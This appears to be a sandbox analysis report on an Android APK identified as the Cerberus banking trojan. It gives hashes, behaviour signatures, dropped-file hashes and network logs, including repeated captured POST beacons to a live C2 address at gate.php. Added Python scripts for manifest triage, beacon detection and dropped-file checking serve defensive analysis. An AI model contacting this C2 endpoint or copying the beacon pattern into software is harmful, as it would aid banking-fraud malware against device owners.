Analysis

  • max time kernel
    66s
  • max time network
    150s
  • platform
    android_x64
  • resource
    android-x64-arm64-20240624-en
  • resource tags

    android, arch:arm, arch:arm64, arch:x64, arch:x86, image:android-x64-arm64-20240624-en, locale:en-us, os:android-11-x64, system
  • submitted
    10-11-2024 22:01

General

  • Target

    edd0a52d877489838cc2937f30b0257888a72771430e0d931c91e1847472f516.apk

  • Size

    2.2MB

  • MD5

    5525349628783c345f3a506d6f762f3f

  • SHA1

    f921c000517391932e4aa7c6c281e003f2d8c2ac

  • SHA256

    edd0a52d877489838cc2937f30b0257888a72771430e0d931c91e1847472f516

  • SHA512

    2166a00e9e0b6fa44d7df38b5474f7cf0ae60fe94b8da9f6dc4935731e84229f7c381f31e661d067e07892cbcf39385f1fef25c91719d4bb16f209b1bf19882c

  • SSDEEP

    49152:jNaMSlwqlbLcxCWHvKom475X6EfkZl1GjbTV6ocEe8ZqSbcBtk3X0grbbTWqbvL8:oMSl9bwxNHvEg5X6EfWKTA7EFqSgrWkf

Malware Config

Extracted

Family

cerberus

C2

http://5.161.217.34/

Signatures

Processes

  • com.film.chapter
    • Removes its main activity from the application launcher
    • Loads dropped Dex/Jar
    • Makes use of the framework's Accessibility service
    • Obtains sensitive information copied to the device clipboard
    • Performs UI accessibility actions on behalf of the user
    • Queries the mobile country code (MCC)
    • Requests disabling of battery optimizations (often used to enable hiding in the background).
    • Listens for changes in the sensor environment (might be used to detect emulation)
    • Checks CPU information
    • Checks memory information
    PID:4469
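    The signatures above are runtime observations; most of the same capabilities leave static traces in the manifest, so a quick manifest triage is a useful complement when a sandbox is not available. The script below is an added example, not part of this report and not code from the sample. The manifest it parses is a constructed stand-in (package com.example.dropper, components .MainActivity and .AccService are invented names), not the decoded manifest of com.film.chapter. It flags a service bound with BIND_ACCESSIBILITY_SERVICE (the permission behind "Performs UI accessibility actions on behalf of the user"), REQUEST_IGNORE_BATTERY_OPTIMIZATIONS (behind "Requests disabling of battery optimizations") and a few other banker staples, and records the launcher activity so its enabled state can be compared after execution: "Removes its main activity from the application launcher" is a runtime change that the manifest alone cannot show.

```python
"""Static triage of a decoded AndroidManifest.xml for the capabilities the
sandbox observed at runtime.  Added example; the manifest below is constructed
and is NOT the manifest of the analysed APK."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS  # ElementTree key prefix for android:* attributes

# Permissions that back the report's signatures or are typical banker add-ons.
SUSPICIOUS_PERMISSIONS = {
    "android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS": "battery-optimization bypass (background persistence)",
    "android.permission.SYSTEM_ALERT_WINDOW": "overlay windows (credential phishing)",
    "android.permission.READ_SMS": "SMS read (OTP theft)",
    "android.permission.RECEIVE_SMS": "SMS interception (OTP theft)",
    "android.permission.REQUEST_INSTALL_PACKAGES": "sideloading further APKs",
}
ACCESSIBILITY_BIND = "android.permission.BIND_ACCESSIBILITY_SERVICE"
LAUNCHER_CATEGORY = "android.intent.category.LAUNCHER"


def triage_manifest(manifest_xml: str) -> dict:
    """Return the package name plus the permissions, accessibility services and
    launcher activities that matter for the behaviours listed in the report."""
    root = ET.fromstring(manifest_xml)
    findings = {
        "package": root.get("package"),
        "permissions": [],             # (name, why it matters)
        "accessibility_services": [],  # services the OS will bind as accessibility services
        "launcher_activities": [],     # compare enabled state after the app has run
    }
    for perm in root.findall("uses-permission"):
        name = perm.get(A + "name")
        if name in SUSPICIOUS_PERMISSIONS:
            findings["permissions"].append((name, SUSPICIOUS_PERMISSIONS[name]))

    app = root.find("application")
    if app is None:
        return findings
    for svc in app.findall("service"):
        # Only services protected by this permission can receive accessibility events.
        if svc.get(A + "permission") == ACCESSIBILITY_BIND:
            findings["accessibility_services"].append(svc.get(A + "name"))
    for act in app.findall("activity"):
        for intent in act.findall("intent-filter"):
            categories = {c.get(A + "name") for c in intent.findall("category")}
            if LAUNCHER_CATEGORY in categories:
                findings["launcher_activities"].append(act.get(A + "name"))
    return findings


def looks_like_accessibility_banker(findings: dict) -> bool:
    """An accessibility service plus any persistence/overlay/SMS permission is
    the combination worth escalating; a video app needs neither."""
    return bool(findings["accessibility_services"]) and bool(findings["permissions"])


# Constructed sample manifest (invented package and component names).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.dropper">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application android:label="Video Player">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".AccService" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""

if __name__ == "__main__":
    result = triage_manifest(SAMPLE_MANIFEST)
    for key, value in result.items():
        print(key, value)
    print("escalate:", looks_like_accessibility_banker(result))
```

    The APK's AndroidManifest.xml is binary AXML; decode it first (for example with `apktool d`) and pass the resulting text to `triage_manifest`. After the sample has run, `adb shell dumpsys package <package>` lists components the app disabled on itself, which is where the launcher activity recorded here should show up if the launcher-hiding signature fired.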

Network

  • flag-us
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    172.217.169.14
  • flag-us
    DNS
    ssl.google-analytics.com
    Remote address:
    1.1.1.1:53
    Request
    ssl.google-analytics.com
    IN A
    Response
    ssl.google-analytics.com
    IN A
    172.217.169.72
  • flag-us
    DNS
    pngimage.net
    Remote address:
    1.1.1.1:53
    Request
    pngimage.net
    IN A
    Response
    pngimage.net
    IN A
    104.21.33.28
    pngimage.net
    IN A
    172.67.140.187
  • flag-us
    DNS
    freeiconshop.com
    Remote address:
    1.1.1.1:53
    Request
    freeiconshop.com
    IN A
    Response
    freeiconshop.com
    IN A
    195.179.237.77
  • flag-us
    GET
    https://pngimage.net/wp-content/uploads/2018/06/white-tick-png-8.png
    Remote address:
    104.21.33.28:443
    Request
    GET /wp-content/uploads/2018/06/white-tick-png-8.png HTTP/2.0
    host: pngimage.net
    user-agent: Mozilla/5.0 (Linux; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36
    accept: image/webp,image/apng,image/*,*/*;q=0.8
    x-requested-with: com.film.chapter
    sec-fetch-site: cross-site
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    accept-encoding: gzip, deflate
    accept-language: en-US,en;q=0.9
    Response
    HTTP/2.0 522
    date: Sun, 10 Nov 2024 22:03:38 GMT
    content-type: text/html; charset=UTF-8
    content-length: 7063
    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zN3BZlZwvQohOKlHma4MKDjiL%2FGFAm%2F4%2FCWS8ea4Wv3fXO1LbIQHxkKMc4kj9yRctJIg4jPkyy%2FQNKIWOWYpg38fA%2FtLj3dfC31d%2BXnXkoJFZzX1njJnEFmXqwfeXqY%3D"}],"group":"cf-nel","max_age":604800}
    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    vary: Accept-Encoding
    x-frame-options: SAMEORIGIN
    referrer-policy: same-origin
    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    expires: Thu, 01 Jan 1970 00:00:01 GMT
    server: cloudflare
    cf-ray: 8e0954f28d9b8877-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=33578&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1058&delivery_rate=80785&cwnd=253&unsent_bytes=0&cid=7ae62cbfb019f044&ts=19616&x=0"
  • flag-us
    GET
    https://freeiconshop.com/wp-content/uploads/edd/android-flat.png
    Remote address:
    195.179.237.77:443
    Request
    GET /wp-content/uploads/edd/android-flat.png HTTP/2.0
    host: freeiconshop.com
    user-agent: Mozilla/5.0 (Linux; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36
    accept: image/webp,image/apng,image/*,*/*;q=0.8
    x-requested-with: com.film.chapter
    sec-fetch-site: cross-site
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    accept-encoding: gzip, deflate
    accept-language: en-US,en;q=0.9
    Response
    HTTP/2.0 200
    cache-control: public, max-age=31536000
    expires: Mon, 10 Nov 2025 22:03:19 GMT
    content-type: image/png
    last-modified: Mon, 20 Nov 2017 16:17:50 GMT
    etag: "262e-5a13002e-2bcbf6f4ea0f20d9;;;"
    accept-ranges: bytes
    content-length: 9774
    date: Sun, 10 Nov 2024 22:03:19 GMT
    server: LiteSpeed
    platform: hostinger
    panel: hpanel
    content-security-policy: upgrade-insecure-requests
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 832
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:03:47 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:04:22 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:04:32 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:05:02 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:05:12 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:05:22 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:05:33 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
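    The seven POSTs above share one shape: a form-encoded body of 832 or 840 bytes sent to //gate.php (note the doubled slash) on a bare-IP host with a Dalvik user agent, roughly every ten seconds, and every one of them answered with a 308 to the https:// form of the same URL. The connection list that follows contains no connection to 5.161.217.34:443, so the sandbox never followed the redirect and no C2 exchange completed; any block on this indicator should cover both ports. The following parser and heuristic are an added example, not part of this report. The raw messages it parses are reconstructed from the headers shown above: the POST body, which the report does not record, is replaced by filler of the stated length, and the 18-byte text of the redirect body is assumed, so both are constructed input.

```python
"""Heuristic for the gate.php beacon pattern captured in the report: a raw
HTTP/1.x request parser, an indicator scorer, and a helper that extracts the
redirect target so the unfollowed 308 is not missed.  Added example; the
sample messages are reconstructed from the report's headers with assumed bodies."""
import ipaddress
import re
from dataclasses import dataclass, field


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict = field(default_factory=dict)  # header names lower-cased
    body: bytes = b""


def parse_request(raw: bytes) -> HttpRequest:
    """Split a raw HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def is_bare_ip(host: str) -> bool:
    """True when the Host header is an IP literal (IPv4 host:port tolerated)."""
    if host.count(":") == 1:
        host = host.split(":")[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


GATE_PATH = re.compile(r"^/+gate\.php$")  # tolerates the doubled leading slash


def beacon_indicators(req: HttpRequest) -> list:
    """Each indicator is weak alone; together they describe the captured beacon."""
    hits = []
    if req.method == "POST" and GATE_PATH.match(req.path):
        hits.append("POST to gate.php")
    if req.path.startswith("//"):
        hits.append("doubled leading slash in path")
    if is_bare_ip(req.headers.get("host", "")):
        hits.append("bare-IP Host header")
    if req.headers.get("user-agent", "").startswith("Dalvik/"):
        hits.append("Dalvik (non-browser) user agent")
    if req.headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        hits.append("form-encoded body")
    return hits


def is_gate_beacon(req: HttpRequest) -> bool:
    """Require the gate.php POST itself plus at least three supporting indicators."""
    hits = beacon_indicators(req)
    return "POST to gate.php" in hits and len(hits) >= 4


def redirect_target(raw_response: bytes):
    """Location of a 3xx response, or None; pivot this into the block list too."""
    head, _, _ = raw_response.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split(" ")[1])
    if status not in (301, 302, 303, 307, 308):
        return None
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "location":
            return value.strip()
    return None


# Constructed from the first POST in the report; the body is filler of the stated length.
SAMPLE_BEACON = (
    b"POST //gate.php HTTP/1.1\r\n"
    b"Content-Length: 832\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)\r\n"
    b"Host: 5.161.217.34\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Accept-Encoding: gzip\r\n"
    b"\r\n" + b"a" * 832
)
# Constructed from the benign icon fetch in the report (headers abridged).
SAMPLE_ICON_GET = (
    b"GET /wp-content/uploads/edd/android-flat.png HTTP/1.1\r\n"
    b"Host: freeiconshop.com\r\n"
    b"User-Agent: Mozilla/5.0 (Linux; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013; wv) "
    b"AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36\r\n"
    b"Accept: image/webp,image/apng,image/*,*/*;q=0.8\r\n"
    b"\r\n"
)
# Constructed from the report's response headers; the 18-byte body text is assumed.
SAMPLE_REDIRECT = (
    b"HTTP/1.1 308 Permanent Redirect\r\n"
    b"Location: https://5.161.217.34//gate.php\r\n"
    b"Date: Sun, 10 Nov 2024 22:03:47 GMT\r\n"
    b"Content-Length: 18\r\n"
    b"Content-Type: text/plain; charset=utf-8\r\n"
    b"\r\n"
    b"Permanent Redirect"
)
```

    Run `is_gate_beacon(parse_request(raw))` over requests reassembled from a capture or proxy log; the icon fetch scores zero indicators while the beacon scores all five. `redirect_target(SAMPLE_REDIRECT)` returns the https:// URL, which is why the indicator for this sample should be the IP on both 80 and 443 rather than the single URL in the Malware Config.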
    Connections (each entry: remote address | hostname or URL | protocols | bytes sent / received | packets sent / received; HTTP or DNS summary where one was recorded)

  • 142.250.179.238:443 | (no hostname recorded) | tls, https | 1.5kB / 40 B | 1 / 1 (two identical connections)
  • 172.217.169.14:443 | android.apis.google.com | tls | 5.6kB / 8.7kB | 23 / 23
  • 172.217.169.72:443 | ssl.google-analytics.com | tls | 1.3kB / 6.2kB | 8 / 8
  • 104.21.33.28:443 | https://pngimage.net/wp-content/uploads/2018/06/white-tick-png-8.png | tls, http2 | 1.9kB / 11.6kB | 17 / 15
    HTTP: GET https://pngimage.net/wp-content/uploads/2018/06/white-tick-png-8.png -> 522
  • 195.179.237.77:443 | https://freeiconshop.com/wp-content/uploads/edd/android-flat.png | tls, http2 | 1.8kB / 15.1kB | 15 / 14
    HTTP: GET https://freeiconshop.com/wp-content/uploads/edd/android-flat.png -> 200
  • 172.217.169.14:443 | android.apis.google.com | tls | 1.8kB / 5.9kB | 11 / 11
  • 5.161.217.34:80 | http://5.161.217.34//gate.php | http | 1.4kB / 409 B | 6 / 4
    HTTP: POST http://5.161.217.34//gate.php -> 308
  • 142.250.187.196:443 | (no hostname recorded) | tls, https | 436 B / 40 B | 2 / 1
  • 142.250.187.196:443 | www.google.com | tls | 10.9kB / 10.5kB | 26 / 30
  • 5.161.217.34:80 | http://5.161.217.34//gate.php | http | 1.3kB / 357 B | 4 / 3 (six identical connections)
    HTTP: POST http://5.161.217.34//gate.php -> 308 (each time)
  • 224.0.0.251:5353 | (mDNS multicast; no hostname or protocol recorded) | 3.7kB | 11 packets
  • 1.1.1.1:53 | android.apis.google.com | dns | 69 B / 109 B | 1 / 1
    DNS: android.apis.google.com -> 172.217.169.14
  • 1.1.1.1:53 | ssl.google-analytics.com | dns | 70 B / 86 B | 1 / 1
    DNS: ssl.google-analytics.com -> 172.217.169.72
  • 1.1.1.1:53 | pngimage.net | dns | 58 B / 90 B | 1 / 1
    DNS: pngimage.net -> 104.21.33.28, 172.67.140.187
  • 1.1.1.1:53 | freeiconshop.com | dns | 62 B / 78 B | 1 / 1
    DNS: freeiconshop.com -> 195.179.237.77

MITRE ATT&CK Mobile v15


Downloads

  • /data/data/com.film.chapter/app_DynamicOptDex/dQ.json

    Filesize

    53KB

    MD5

    4c405a425d5263f6490085bfe1fb6906

    SHA1

    0ff79f0859caf8f84b2615d0c4595772e54829e1

    SHA256

    148d01b45d3de9c9aa01045bafd5c72a1608c4449566aea7955592358dfb12f0

    SHA512

    4b82ba1dbfe39d18a9e3719c87c5f076bc68fc7fa07db0caddbaa5abd41ac6628620dfbbe155d25667310ba1a2674c2cad76d4255ab68a7f161c0a0f70072bd2

  • /data/data/com.film.chapter/app_DynamicOptDex/dQ.json

    Filesize

    53KB

    MD5

    7ab72394bb86d1d70c5882a6dcd07357

    SHA1

    3a4e06074220cb735df034060b922d6288e399bc

    SHA256

    6491724426a3dfb5a5ccb9745d4d22fda480d725a6104de1bd699cce9dfc661b

    SHA512

    72099ad30a713ca88122567ab696d292559452e525d5d6bc6a2f4a1d416738f9973daf27c7b548620403ea3190f2b2bc5557847e4a7a55429928dfa57376e98f

  • /data/data/com.film.chapter/app_DynamicOptDex/oat/dQ.json.cur.prof

    Filesize

    160B

    MD5

    2508932e5d043772575f9b632e4da319

    SHA1

    f6eec2e2684a264b507301bc958987a0d4fd1100

    SHA256

    cdc776a845ded9e2e4e7fab3a2b6bb32ddb6d8095b126fe8e69d299b1de1816b

    SHA512

    bdf4993ba4843c602d00e453efcf5840760b24c7680bb77c3ea59d1200ce297fc5fdff4d4cd2811b60dd35a99f21c6dce8c866adc6626bb5cf4100d47137dbb5

  • /data/user/0/com.film.chapter/app_DynamicOptDex/dQ.json

    Filesize

    103KB

    MD5

    8370872f52a44a97444de3c6835e7e14

    SHA1

    ca35fa3e2883466c8b089b16f6a2745d9e335697

    SHA256

    8532c8b0f978411313e05b4ab29eaff23a197781d42155ca6a26268e06df4586

    SHA512

    6ee776db5608d091b6b84db8831590bda010e90e3168cbe3af39743c2e9a62d75f61219f3dac52fe16ed75a919149d07dfbc0861f67dbeaf5f3d2e3201cd3f01
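    Three things about the dropped files above matter for triage: they live in app_DynamicOptDex and the process signature says "Loads dropped Dex/Jar", so the .json extension is not to be trusted; /data/data/com.film.chapter and /data/user/0/com.film.chapter are the same directory on Android, so dQ.json was written three times with three different contents (two 53KB versions and a 103KB one) during a 66-second run; and the .cur.prof file under oat/ is the ART profile that the runtime creates once the file has actually been loaded as code. The script below is an added example, not part of this report. It identifies a dropped file by magic rather than extension, validates the Adler-32 in a DEX header, and produces the same hash set the report lists. The buffers it runs on are constructed stand-ins (a minimal synthetic DEX header, a ZIP signature, a JSON document), not the real dQ.json, of which only the hashes are known.

```python
"""Type and integrity check for files dropped by an Android sample, for use on
payloads pulled from the device with adb.  Added example; the sample buffers
are constructed and are NOT the dropped files from the report."""
import hashlib
import struct
import zlib

DEX_MAGIC = b"dex\n"      # followed by 3-digit version and a NUL, e.g. b"dex\n035\x00"
ZIP_MAGIC = b"PK\x03\x04"  # .jar/.apk/.zip
ELF_MAGIC = b"\x7fELF"
DEX_HEADER_SIZE = 0x70


def identify(buf: bytes) -> str:
    """Classify by leading bytes; the extension is ignored on purpose."""
    if buf.startswith(DEX_MAGIC) and len(buf) >= 8 and buf[7:8] == b"\x00":
        return "dex (version %s)" % buf[4:7].decode("ascii", "replace")
    if buf.startswith(ZIP_MAGIC):
        return "zip/jar/apk"
    if buf.startswith(ELF_MAGIC):
        return "elf"
    if buf.lstrip()[:1] in (b"{", b"["):
        return "json-like text"
    return "unknown"


def dex_checksum_ok(buf: bytes) -> bool:
    """DEX header layout: magic[8], checksum u32 (Adler-32 over everything
    after the checksum field, i.e. bytes 12..end), signature[20], file_size..."""
    if not buf.startswith(DEX_MAGIC) or len(buf) < DEX_HEADER_SIZE:
        return False
    stored = struct.unpack_from("<I", buf, 8)[0]
    return (zlib.adler32(buf[12:]) & 0xFFFFFFFF) == stored


def report_hashes(buf: bytes) -> dict:
    """Same digest set the sandbox report lists per dropped file."""
    return {
        "size": len(buf),
        "md5": hashlib.md5(buf).hexdigest(),
        "sha1": hashlib.sha1(buf).hexdigest(),
        "sha256": hashlib.sha256(buf).hexdigest(),
        "sha512": hashlib.sha512(buf).hexdigest(),
    }


def triage_dropped(path: str, buf: bytes) -> dict:
    """Combine type, extension mismatch, DEX integrity and hashes for one file."""
    kind = identify(buf)
    ext = path.rsplit(".", 1)[-1].lower() if "." in path.rsplit("/", 1)[-1] else ""
    return {
        "path": path,
        "kind": kind,
        "extension_mismatch": ext == "json" and not kind.startswith("json"),
        "dex_checksum_ok": dex_checksum_ok(buf) if kind.startswith("dex") else None,
        **report_hashes(buf),
    }


def make_fake_dex() -> bytes:
    """Constructed 0x70-byte DEX header with a valid checksum and no sections."""
    buf = bytearray(DEX_HEADER_SIZE)
    buf[0:8] = b"dex\n035\x00"
    struct.pack_into("<I", buf, 32, len(buf))        # file_size
    struct.pack_into("<I", buf, 36, DEX_HEADER_SIZE)  # header_size
    struct.pack_into("<I", buf, 40, 0x12345678)       # endian_tag (little-endian)
    struct.pack_into("<I", buf, 8, zlib.adler32(bytes(buf[12:])) & 0xFFFFFFFF)
    return bytes(buf)


if __name__ == "__main__":
    for name, data in (
        ("/data/data/com.film.chapter/app_DynamicOptDex/dQ.json", make_fake_dex()),
        ("/sdcard/Download/update.jar", ZIP_MAGIC + b"\x00" * 26),
        ("/data/data/com.film.chapter/files/config.json", b'{"c2": "http://5.161.217.34/"}'),
    ):
        print(triage_dropped(name, data))
```

    Pull the files with `adb pull` from a rooted test device or emulator and run `triage_dropped` over them; a DEX whose stored checksum does not match the recomputed one has been truncated, patched on disk, or captured mid-write, which is the likely explanation when the same path carries several hash sets in one run.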
